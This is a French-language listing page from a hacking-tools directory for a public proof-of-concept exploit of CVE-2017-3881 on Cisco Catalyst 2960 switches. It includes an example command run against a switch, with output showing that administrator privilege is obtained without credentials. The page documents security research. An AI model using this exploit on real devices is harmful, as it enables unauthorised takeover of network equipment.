Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
cisco-rce — CVE-2017-3881 Cisco Catalyst PoC d'exécution de code à distance | Kitploit
Outils/GitHubGitHub/artkond/cisco-rce
Sécurité des Systèmes EmbarquésFrameworks d'ExploitationAnalyse des VulnérabilitésExploitationSécurité RéseauTests d'Intrusion
GitHubartkond/cisco-rce

cisco-rce

CVE-2017-3881 Cisco Catalyst PoC d'exécution de code à distance

Voir le dépôt
213795il y a 9 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2017-3881 Cisco IOS exécution de code à distance

Ce dépôt contient le code Proof-Of-Concept pour exploiter la vulnérabilité d'exécution de code à distance divulguée par Cisco Systems le 17 mars 2017 - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170317-cmp

Description

L'analyse de l'exploit est disponible ici - https://artkond.com/2017/04/10/cisco-catalyst-remote-code-execution/

Le code d'exploit RCE est disponible pour le modèle de switch Cisco Catalyst 2960. Cet exploit dépend du firmware. Deux versions de firmware sont prises en charge :

  • 12.2(55)SE1 C2960-LANBASEK9-M

  • 12.2(55)SE11 C2960-LANBASEK9-M

Le code de déni de service est disponible sous forme de module Ruby Metasploit. Il devrait fonctionner avec la plupart des switchs mentionnés dans l'avis de Cisco (à confirmer).

Exemple d'utilisation

root@kitploit:~
$ python c2960-lanbasek9-m-12.2.55.se11 192.168.88.10 --set
[+] Connection OK
[+] Recieved bytes from telnet service: '\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfd\x1f'
[+] Sending cluster option
[+] Setting credless privilege 15 authentication
[+] All done
$ telnet 192.168.88.10
Trying 192.168.88.10...
Connected to 192.168.88.10.
Escape character is '^]'.

catalyst1#show priv
Current privilege level is 15

Auteur

Artem Kondratenko https://twitter.com/artkond

Télécharger l’outil